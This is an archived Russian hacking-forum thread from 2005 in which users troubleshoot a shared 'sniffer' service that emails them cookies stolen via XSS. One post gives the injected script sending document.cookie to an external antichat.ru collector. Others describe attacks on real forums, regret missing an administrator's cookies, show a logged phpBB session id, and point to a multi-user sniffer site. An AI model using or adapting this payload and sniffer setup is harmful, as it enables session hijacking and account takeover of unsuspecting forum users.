PDA

Просмотр полной версии : Подписка на античатовский сниффер


Mastermind
31.08.2005, 13:35
Чет я никак понять не могу...
Добрая часть логов не идет на мыло...
Сам проверял...
Зашел на форум, где внедрен XSS...
Захожу на log сниффера... Есть!
Проверяю мыло - Нет!
Пробовал на разные мыла подписываться...
Результат один!
Подписка активна... А куки не идут...
Уже стоко народу отвечала на мой топик, а куки пришли только от одного на ящик...
Кому интересно внедрен такой скрипт:
<script>i=new/**/Image();i.src='http://antichat.ru/cgi-bin/s.jpg?'+document.cookie;</script>

Да... на один ящик еще приходит:
host1220 <host1220@serv.hostland.ru>
Кому: undisclosed-recipients:;
Копия:
Тема: No subject
Тело: [пустое]
Как мне кажется тоже от сниффера...

GreenBear
31.08.2005, 14:24
Дык может ты в полях не то написал?

Mastermind
31.08.2005, 14:56
Заполняю фильтр реферер: site.com
Проблема в том, что какие то куки на мыло идут, а какие то нет, хотя в логе отображаются...

Barsik
31.08.2005, 15:04
Я кстати тоже не пойму что писать там.
Чтоб куки доходили на мыло (Mail.ru)
Что нужно писать в реферер?
Например в кукисе пишет это
REFERER=http://www.xxx.com/forum/viewtopic.php?t=900
Чтоб на мыло приходило надо писать www.xxx.com или www.xxx.com/forum/viewtopic.php?t=900
И обязательно заполнять 2 поля?

Mastermind
31.08.2005, 15:14
Barsik, подстроку реферера... например, xxx.com или www.xxx.com...

Кстати, сейчас подписка на 2 мыла... по идее должны приходить одинаковые результаты, а на одно мыло, к примеру, пришло 2 куки, а на другое только 1, причем отличное от тех 2...

Странно...

GreenBear
31.08.2005, 15:27
Возможно просто сервер принимает сообщения снифера, как спам и фильтрует. Или же сервер античата глючит.

Mastermind
31.08.2005, 15:45
Один аккаунт на гмейле... другой на яндексе... на гмейл пришло уведомление о подписке и один куки... на яндекс подписка, несколько кук, несколько host1220...

GreenBear
31.08.2005, 15:49
Да хз, ты что то не так делаешь. У меня приходит все, точнее приходило. Давно я неподписывался

Barsik
31.08.2005, 15:51
Мне на мэйле тоже пришло что то с хостом, но кук нет.
Mastermind Спасибо за ответ. А что писать в другой строчке или ее можно не заполнять?

Mastermind
31.08.2005, 16:27
Это фильтр на Query... его можно не заполнять...

Xex
10.09.2005, 02:48
Ребят, согласен, такая же ботва...одну икссэсэс атаку провел на ура...просмотров поста на форуме двадцать из них десять ответов...а приходят только избранные куки......и эти host письма...обидно...куки админа из-за етого глюка не приходят...в списках спама античат вообще не числится...а вот host1220 пробовал добавлять в спам лист не фильтруется...че к чему...=(...

hamula
30.09.2005, 10:06
Вот и сам попробовал... Подписался - не приходит...
Подписывался через реферер, смотрю в общем логе:

[Fri Sep 30 09:54:09 2005] IP=195.149.70.22 SITE=
REFERER=
QUERY=phpbb2mysql_data=a:0:{}; phpbb2mysql_sid=0733561e97e66c1126e22452fc203c03
AGENT=

Т.е. реферер может иногда вообще не заполняться? как тогда их фильтровать???

Егорыч+++
30.09.2005, 10:17
С почтой могут быть проблеммы... Используйте многопользовательские сниферы... http://antichat.org/sniffer . Там создаете свой снифер и пароль на него по желанию.